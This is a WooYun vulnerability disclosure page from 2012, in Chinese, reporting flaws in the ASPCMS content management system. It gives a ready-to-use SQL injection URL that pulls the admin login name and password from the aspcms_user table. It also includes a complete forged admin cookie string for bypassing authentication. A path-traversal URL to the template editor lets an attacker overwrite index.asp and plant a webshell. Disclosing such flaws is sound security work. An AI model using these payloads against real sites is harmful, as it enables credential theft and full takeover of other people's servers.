当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04214

漏洞标题:aspcms 后台文件无验证注入+ cookies欺骗

相关厂商:ASPCMS

漏洞作者: 独角兽

提交时间:2012-02-10 14:14

修复时间:2012-02-10 14:14

公开时间:2012-02-10 14:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-02-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

后台文件 AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!

详细说明:

————————后台注射————————
http://www.aspcms.com/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
版本不同需要更改值。
——————Cookies欺骗——————
cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
——————webshell获取——————
所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了
AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp

漏洞证明:

修复方案:

版权声明:转载请注明来源 独角兽@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)